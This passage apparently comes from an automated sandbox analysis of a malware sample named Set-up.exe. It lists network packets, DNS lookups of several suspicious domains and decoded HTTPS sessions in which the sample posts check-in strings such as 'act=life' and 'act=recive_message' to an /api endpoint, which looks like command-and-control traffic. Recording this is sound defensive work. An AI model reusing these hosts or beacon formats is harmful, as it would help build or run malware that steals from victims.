                                                                                                                                                Dec 30, 2024 18:13:27.457788944 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.457828045 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.457864046 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.457881927 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.457887888 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.457916021 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.457941055 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.459610939 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.459651947 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.459669113 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.459672928 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.459701061 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.459709883 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.459719896 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.459736109 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.459769011 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.459774017 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.459800005 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.459813118 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.459976912 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.459990978 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.460028887 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.460035086 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.460062981 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.460067987 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.460205078 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.460221052 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.460259914 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.460266113 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.460283041 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.460302114 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.462277889 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.544820070 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.544836044 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.545110941 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.545120001 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.545160055 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.545337915 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.545351028 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.545409918 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.545417070 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.545454979 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.546133041 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.546145916 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.546181917 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.546186924 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.546209097 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.546224117 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.546365976 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.546379089 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.546435118 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.546441078 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.546508074 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548094988 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548110008 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548137903 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548142910 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548161983 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548178911 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548371077 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548383951 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548418999 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548423052 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548444986 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548454046 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548573017 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548593998 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548619986 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548625946 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548641920 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548654079 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548880100 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548892975 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548923016 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548928976 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.548950911 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.548964024 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.550163031 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.633445978 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.633466005 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.633531094 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.633538961 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.633614063 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.634183884 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634196043 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634252071 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.634258986 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634300947 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.634902000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634917974 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.634991884 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.634998083 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.635056973 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.635179043 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.635191917 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.635250092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.635256052 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.635299921 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.636852980 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.636867046 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.636938095 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.636943102 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.636981964 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.636985064 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.636992931 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637020111 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637041092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637078047 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637080908 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637116909 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637255907 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637268066 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637307882 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637326956 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637485027 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637492895 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637497902 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637512922 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637531996 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637537003 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.637562990 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.637574911 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.639486074 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722067118 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722083092 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722132921 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722141027 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722157001 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722187042 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722879887 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722893000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.722954035 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.722959995 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723110914 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.723839998 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723853111 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723897934 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723918915 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.723925114 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.723952055 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.723984003 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725526094 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725539923 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725577116 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725583076 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725605965 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725622892 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725640059 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725665092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725672007 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725687027 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725856066 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725867987 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725903034 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.725909948 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.725919008 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.726150990 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.726166964 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.726191998 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.726198912 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.726211071 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.728290081 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.820019007 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.820044994 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.820089102 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.820101023 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.820128918 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.824429989 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.824448109 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.824497938 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.824506044 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829471111 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829495907 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829530001 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.829539061 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829566956 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.829916954 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829932928 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829963923 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.829971075 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.829988956 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.838886023 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.838900089 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.838937998 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.838947058 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.838972092 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839340925 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839359045 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839390039 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839396000 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839413881 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839544058 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839555979 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839587927 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839595079 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839607000 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839801073 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839819908 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839847088 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.839854002 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.839870930 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.908628941 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.908641100 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.908685923 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.908694983 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.908729076 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.912976980 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.912995100 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.913053989 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.913062096 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.913091898 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.914732933 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.914762974 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.914786100 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.914789915 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.914800882 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.915003061 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.921623945 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.921636105 CET44349720104.21.37.128192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:27.921649933 CET49720443192.168.2.5104.21.37.128
                                                                                                                                                Dec 30, 2024 18:13:27.921654940 CET44349720104.21.37.128192.168.2.5

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 30, 2024 18:13:09.477999926 CET5557953192.168.2.51.1.1.1
                                                                                                                                                Dec 30, 2024 18:13:09.492302895 CET53555791.1.1.1192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:18.764214993 CET5727653192.168.2.51.1.1.1
                                                                                                                                                Dec 30, 2024 18:13:18.869693995 CET53572761.1.1.1192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:20.057672977 CET5846153192.168.2.51.1.1.1
                                                                                                                                                Dec 30, 2024 18:13:20.070615053 CET53584611.1.1.1192.168.2.5
                                                                                                                                                Dec 30, 2024 18:13:21.196010113 CET5271053192.168.2.51.1.1.1
                                                                                                                                                Dec 30, 2024 18:13:21.204401970 CET53527101.1.1.1192.168.2.5

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Dec 30, 2024 18:13:09.477999926 CET192.168.2.51.1.1.10x64e1Standard query (0)laborersquei.clickA (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:13:18.764214993 CET192.168.2.51.1.1.10x4ad5Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:13:20.057672977 CET192.168.2.51.1.1.10x2fdeStandard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:13:21.196010113 CET192.168.2.51.1.1.10xf280Standard query (0)dfgh.onlineA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Dec 30, 2024 18:13:09.492302895 CET1.1.1.1192.168.2.50x64e1No error (0)laborersquei.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:13:09.492302895 CET1.1.1.1192.168.2.50x64e1No error (0)laborersquei.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:13:18.869693995 CET1.1.1.1192.168.2.50x4ad5No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:13:20.070615053 CET1.1.1.1192.168.2.50x2fdeNo error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:13:20.070615053 CET1.1.1.1192.168.2.50x2fdeNo error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                                                Dec 30, 2024 18:13:21.204401970 CET1.1.1.1192.168.2.50xf280Name error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • laborersquei.click
                                                                                                                                                • cegu.shop
                                                                                                                                                • klipvumisui.shop

                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.549704188.114.96.34432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:10 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 8
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:10 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                Data Ascii: act=life
                                                                                                                                                2024-12-30 17:13:10 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:10 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=7rj7ldcepeccp9d6104j3qbptp; expires=Fri, 25 Apr 2025 10:59:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uX1ZlxSd6G6BDwT%2F453BM6hw7JBFa2YLKzPRZYamOElVzOgZP%2F9qzKwz%2BzLWO6fFxo87m%2BN97iD8u%2B3Xrj5gcjwjvxotHKThjEYbl59j0YZp8SPMgSmhQ22ffsF7KdZL2WwWQow%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8fa3a8ae0b8b4363-EWR
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1640&rtt_var=624&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=1780487&cwnd=238&unsent_bytes=0&cid=23d329adac9f6d18&ts=492&x=0"
                                                                                                                                                2024-12-30 17:13:10 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                2024-12-30 17:13:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.549705188.114.96.34432164C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-30 17:13:10 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                Content-Length: 77
                                                                                                                                                Host: laborersquei.click
                                                                                                                                                2024-12-30 17:13:10 UTC77OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 4e 4f 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--DNO&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                                2024-12-30 17:13:11 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 30 Dec 2024 17:13:11 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: PHPSESSID=fc3e2pmngfh7m2q44iqn2vr6hp; expires=Fri, 25 Apr 2025 10:59:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                Pragma: no-cache
                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                vary: accept-encoding
